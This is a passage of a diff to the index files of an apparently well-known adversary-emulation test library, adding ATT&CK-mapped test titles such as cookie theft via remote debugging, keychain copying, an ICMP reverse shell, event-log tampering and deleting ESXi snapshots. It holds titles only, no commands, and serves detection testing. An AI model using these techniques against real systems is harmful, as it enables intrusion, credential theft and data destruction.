 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,18,Allowing custom application to execute during new RDP logon session,b051b3c0-66e7-4a81-916d-e6383bd3a669,command_prompt
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,19,Creating Boot Verification Program Key for application execution during successful boot,6e1666d5-3f2b-4b9a-80aa-f011322380d4,command_prompt
+privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,20,Add persistence via Windows Context Menu,de47f4a0-2acb-416d-9a6b-cee584a4c4d1,command_prompt
 privilege-escalation,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 privilege-escalation,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 privilege-escalation,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
@@ -683,6 +698,7 @@ execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using
 execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
 execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
 execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
+execution,T1059.010,Command and Scripting Interpreter: AutoHotKey & AutoIT,1,AutoHotKey script execution,7b5d350e-f758-43cc-a761-8e3f6b052a03,powershell
 execution,T1059,Command and Scripting Interpreter,1,AutoIt Script Execution,a9b93f17-31cb-435d-a462-5e838a2a6026,powershell
 execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
@@ -839,6 +855,7 @@ persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Sta
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,18,Allowing custom application to execute during new RDP logon session,b051b3c0-66e7-4a81-916d-e6383bd3a669,command_prompt
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,19,Creating Boot Verification Program Key for application execution during successful boot,6e1666d5-3f2b-4b9a-80aa-f011322380d4,command_prompt
+persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,20,Add persistence via Windows Context Menu,de47f4a0-2acb-416d-9a6b-cee584a4c4d1,command_prompt
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
@@ -908,6 +925,7 @@ command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b
 command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell
 command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
 command-and-control,T1219,Remote Access Software,14,Splashtop Streamer Execution,3e1858ee-3550-401c-86ec-5e70ed79295b,powershell
+command-and-control,T1219,Remote Access Software,15,Microsoft App Quick Assist Execution,1aea6d15-70f1-4b4e-8b02-397b5d5ffe75,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -1022,6 +1040,7 @@ credential-access,T1003,OS Credential Dumping,6,Dump Credential Manager using ke
 credential-access,T1003,OS Credential Dumping,7,Send NTLM Hash with RPC Test Connection,0b207037-813c-4444-ac3f-b597cf280a67,powershell
 credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
 credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
+credential-access,T1539,Steal Web Session Cookie,4,Steal Chrome v127+ cookies via Remote Debugging (Windows),b647f4ee-88de-40ac-9419-f17fac9489a7,powershell
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
@@ -1180,6 +1199,7 @@ discovery,T1087.002,Account Discovery: Domain Account,22,Suspicious LAPS Attribu
 discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
 discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
 discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,11,ESXi - Local Account Discovery via ESXCLI,9762ac6e-aa60-4449-a2f0-cbbd0e1fd22c,command_prompt
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,5,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
@@ -1243,6 +1263,8 @@ discovery,T1082,System Information Discovery,35,"Check OS version via ""ver"" co
 discovery,T1082,System Information Discovery,36,"Display volume shadow copies with ""vssadmin""",7161b085-816a-491f-bab4-d68e974b7995,command_prompt
 discovery,T1082,System Information Discovery,37,Identify System Locale and Regional Settings with PowerShell,ce479c1a-e8fa-42b2-812a-96b0f2f4d28a,command_prompt
 discovery,T1082,System Information Discovery,38,Enumerate Available Drives via gdr,c187c9bc-4511-40b3-aa10-487b2c70b6a5,command_prompt
+discovery,T1082,System Information Discovery,39,Discover OS Product Name via Registry,be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7,command_prompt
+discovery,T1082,System Information Discovery,40,Discover OS Build Number via Registry,acfcd709-0013-4f1e-b9ee-bc1e7bafaaec,command_prompt
 discovery,T1016.002,System Network Configuration Discovery: Wi-Fi Discovery,1,Enumerate Stored Wi-Fi Profiles And Passwords via netsh,53cf1903-0fa7-4177-ab14-f358ae809eec,command_prompt
 discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
 discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
@@ -1298,6 +1320,8 @@ discovery,T1614.001,System Location Discovery: System Language Discovery,1,Disco
 discovery,T1614.001,System Location Discovery: System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
 discovery,T1614.001,System Location Discovery: System Language Discovery,7,Discover System Language with dism.exe,69f625ba-938f-4900-bdff-82ada3df5d9c,command_prompt
 discovery,T1614.001,System Location Discovery: System Language Discovery,8,Discover System Language by Windows API Query,e39b99e9-ce7f-4b24-9c88-0fbad069e6c6,command_prompt
+discovery,T1614.001,System Location Discovery: System Language Discovery,9,Discover System Language with WMIC,4758003d-db14-4959-9c0f-9e87558ac69e,command_prompt
+discovery,T1614.001,System Location Discovery: System Language Discovery,10,Discover System Language with Powershell,1f23bfe8-36d4-49ce-903a-19a1e8c6631b,powershell
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
 discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
 discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
@@ -1347,11 +1371,13 @@ discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26
 discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
 discovery,T1124,System Time Discovery,4,System Time Discovery W32tm as a Delay,d5d5a6b0-0f92-42d8-985d-47aafa2dd4db,command_prompt
 discovery,T1124,System Time Discovery,5,System Time with Windows time Command,53ead5db-7098-4111-bb3f-563be390e72e,command_prompt
+discovery,T1124,System Time Discovery,6,Discover System Time Zone via Registry,25c5d1f1-a24b-494a-a6c5-5f50a1ae7f47,command_prompt
 impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
 impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
 impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
 impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
 impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
+impact,T1491.001,Defacement: Internal Defacement,3,ESXi - Change Welcome Message on Direct Console User Interface (DCUI),30905f21-34f3-4504-8b4c-f7a5e314b810,command_prompt
 impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
 impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
 impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
@@ -1361,6 +1387,7 @@ impact,T1486,Data Encrypted for Impact,9,Data Encrypt Using DiskCryptor,44b68e11
 impact,T1486,Data Encrypted for Impact,10,Akira Ransomware drop Files with .akira Extension and Ransomnote,ab3f793f-2dcc-4da5-9c71-34988307263f,powershell
 impact,T1485,Data Destruction,1,Windows - Overwrite file with SysInternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
 impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
+impact,T1485,Data Destruction,5,ESXi - Delete VM Snapshots,1207ddff-f25b-41b3-aa0e-7c26d2b546d1,command_prompt
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
 impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
 impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -1377,6 +1404,7 @@ impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483
 impact,T1529,System Shutdown/Reboot,12,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
 impact,T1529,System Shutdown/Reboot,13,ESXi - Terminates VMs using pkill,987c9b4d-a637-42db-b1cb-e9e242c3991b,command_prompt
 impact,T1529,System Shutdown/Reboot,14,ESXi - Avoslocker enumerates VMs and forcefully kills VMs,189f7d6e-9442-4160-9bc3-5e4104d93ece,command_prompt
+impact,T1529,System Shutdown/Reboot,15,ESXi - vim-cmd Used to Power Off VMs,622cc1a0-45e7-428c-aed7-c96dd605fbe6,command_prompt
 initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1566.002,Phishing: Spearphishing Link,1,Paste and run technique,bc177ef9-6a12-4ebc-a2ec-d41e19c2791d,powershell
 initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell

atomics/Indexes/Indexes-Markdown/containers-index.md

@@ -249,7 +249,7 @@
 - T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/iaas-index.md

@@ -251,7 +251,7 @@
 - T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/index.md

@@ -122,8 +122,11 @@
   - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
   - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
   - Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
-  - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
+  - Atomic Test #4: Detect Virtualization Environment via ioreg [macos]
   - Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
+  - Atomic Test #6: Detect Virtualization Environment using sysctl (hw.model) [macos]
+  - Atomic Test #7: Check if System Integrity Protection is enabled [macos]
+  - Atomic Test #8: Detect Virtualization Environment using system_profiler [macos]
 - [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md)
   - Atomic Test #1: rm -rf [macos, linux]
   - Atomic Test #2: rm -rf [linux]
@@ -169,6 +172,7 @@
   - Atomic Test #3: attrib - Remove read-only attribute [windows]
   - Atomic Test #4: attrib - hide file [windows]
   - Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
+  - Atomic Test #6: SubInAcl Execution [windows]
 - T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.007 Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md)
   - Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
@@ -201,6 +205,7 @@
   - Atomic Test #11: Prevent Powershell History Logging [windows]
   - Atomic Test #12: Clear Powershell History by Deleting History File [windows]
   - Atomic Test #13: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
+  - Atomic Test #14: Clear PowerShell Session History [windows]
 - [T1202 Indirect Command Execution](../../T1202/T1202.md)
   - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
   - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
@@ -294,6 +299,9 @@
   - Atomic Test #5: Clear Windows Audit Policy Config [windows]
   - Atomic Test #6: Disable Event Logging with wevtutil [windows]
   - Atomic Test #7: Makes Eventlog blind with Phant0m [windows]
+  - Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell [windows]
+  - Atomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell [windows]
+  - Atomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell [windows]
 - [T1218.002 Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md)
   - Atomic Test #1: Control Panel Items [windows]
 - T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -323,6 +331,7 @@
   - Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows]
   - Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows]
   - Atomic Test #24: Set a firewall rule using New-NetFirewallRule [windows]
+  - Atomic Test #25: ESXi - Set Firewall to PASS Traffic [windows]
 - [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md)
   - Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows]
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -484,6 +493,10 @@
   - Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
   - Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd [windows]
   - Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell [windows]
+  - Atomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd [windows]
+  - Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell [windows]
+  - Atomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd [windows]
+  - Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell [windows]
 - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -640,6 +653,10 @@
   - Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune [windows]
   - Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO [windows]
   - Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key [windows]
+  - Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd [windows]
+  - Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
+  - Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
+  - Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -991,7 +1008,6 @@
   - Atomic Test #2: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry [windows]
 - [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
   - Atomic Test #1: Launch Daemon [macos]
-  - Atomic Test #2: Launch Daemon - Users Directory [macos]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
   - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
@@ -1108,6 +1124,7 @@
   - Atomic Test #17: Modify BootExecute Value [windows]
   - Atomic Test #18: Allowing custom application to execute during new RDP logon session [windows]
   - Atomic Test #19: Creating Boot Verification Program Key for application execution during successful boot [windows]
+  - Atomic Test #20: Add persistence via Windows Context Menu [windows]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #1: Admin Account Manipulate [windows]
   - Atomic Test #2: Domain Account and Group Manipulate [windows]
@@ -1318,7 +1335,8 @@
   - Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
   - Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
   - Atomic Test #5: Run Shellcode via Syscall in Go [windows]
-- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md)
+  - Atomic Test #1: AutoHotKey script execution [windows]
 - T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1610 Deploy a container](../../T1610/T1610.md)
   - Atomic Test #1: Deploy Docker container [containers]
@@ -1404,12 +1422,14 @@
   - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
   - Atomic Test #5: Command Prompt read contents from CMD file and execute [windows]
   - Atomic Test #6: Command prompt writing script to file then executes it [windows]
-- T1651 Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1651 Cloud Administration Command](../../T1651/T1651.md)
+  - Atomic Test #1: AWS Run Command (and Control) [iaas:aws]
 - [T1059.005 Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md)
   - Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
   - Atomic Test #2: Encoded VBS code execution [windows]
   - Atomic Test #3: Extract Memory via VBA [windows]
-- T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1648 Serverless Execution](../../T1648/T1648.md)
+  - Atomic Test #1: Lambda Function Hijack [iaas:aws]
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1569.002 System Services: Service Execution](../../T1569.002/T1569.002.md)
   - Atomic Test #1: Execute a Command as a Service [windows]
@@ -1536,7 +1556,6 @@
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
   - Atomic Test #1: Launch Daemon [macos]
-  - Atomic Test #2: Launch Daemon - Users Directory [macos]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
   - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - [T1505.003 Server Software Component: Web Shell](../../T1505.003/T1505.003.md)
@@ -1638,6 +1657,7 @@
   - Atomic Test #17: Modify BootExecute Value [windows]
   - Atomic Test #18: Allowing custom application to execute during new RDP logon session [windows]
   - Atomic Test #19: Creating Boot Verification Program Key for application execution during successful boot [windows]
+  - Atomic Test #20: Add persistence via Windows Context Menu [windows]
 - [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
   - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
   - Atomic Test #2: Azure AD - Create a new user [azure-ad]
@@ -1824,6 +1844,7 @@
   - Atomic Test #12: RustDesk Files Detected Test on Windows [windows]
   - Atomic Test #13: Splashtop Execution [windows]
   - Atomic Test #14: Splashtop Streamer Execution [windows]
+  - Atomic Test #15: Microsoft App Quick Assist Execution [windows]
 - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1572 Protocol Tunneling](../../T1572/T1572.md)
@@ -1831,6 +1852,8 @@
   - Atomic Test #2: DNS over HTTPS Regular Beaconing [windows]
   - Atomic Test #3: DNS over HTTPS Long Domain Query [windows]
   - Atomic Test #4: run ngrok [windows]
+  - Atomic Test #5: Microsoft Dev tunnels (Linux/macOS) [linux, macos]
+  - Atomic Test #6: VSCode tunnels (Linux/macOS) [linux, macos]
 - T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1859,6 +1882,7 @@
   - Atomic Test #1: ICMP C2 [windows]
   - Atomic Test #2: Netcat C2 [windows]
   - Atomic Test #3: Powercat C2 [windows]
+  - Atomic Test #4: Linux ICMP Reverse Shell using icmp-cnc [linux]
 - T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1986,6 +2010,7 @@
 - [T1005 Data from Local System](../../T1005/T1005.md)
   - Atomic Test #1: Search files of interest and save them to a single zip file (Windows) [windows]
   - Atomic Test #2: Find and dump sqlite databases (Linux) [linux]
+  - Atomic Test #3: Copy Apple Notes database files using AppleScript [macos]
 - [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
   - Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [linux]
   - Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux]
@@ -2030,7 +2055,8 @@
   - Atomic Test #1: Enable Apple Remote Desktop Agent [macos]
 - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1021.004 Remote Services: SSH](../../T1021.004/T1021.004.md)
-  - Atomic Test #1: ESXi - Enable SSH via PowerCLI [linux]
+  - Atomic Test #1: ESXi - Enable SSH via PowerCLI [windows]
+  - Atomic Test #2: ESXi - Enable SSH via VIM-CMD [windows]
 - [T1091 Replication Through Removable Media](../../T1091/T1091.md)
   - Atomic Test #1: USB Malware Spread Simulation [windows]
 - T1021.008 Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2113,6 +2139,8 @@
   - Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
   - Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
   - Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
+  - Atomic Test #4: Steal Chrome v127+ cookies via Remote Debugging (Windows) [windows]
+  - Atomic Test #5: Copy Safari BinaryCookies files using AppleScript [macos]
 - [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
   - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
   - Atomic Test #2: Registry parse with pypykatz [windows]
@@ -2132,6 +2160,7 @@
   - Atomic Test #1: Keychain Dump [macos]
   - Atomic Test #2: Export Certificate Item(s) [macos]
   - Atomic Test #3: Import Certificate Item(s) into Keychain [macos]
+  - Atomic Test #4: Copy Keychain using cat utility [macos]
 - [T1003.004 OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md)
   - Atomic Test #1: Dumping LSA Secrets [windows]
   - Atomic Test #2: Dump Kerberos Tickets from LSA using dumper.ps1 [windows]
@@ -2273,6 +2302,9 @@
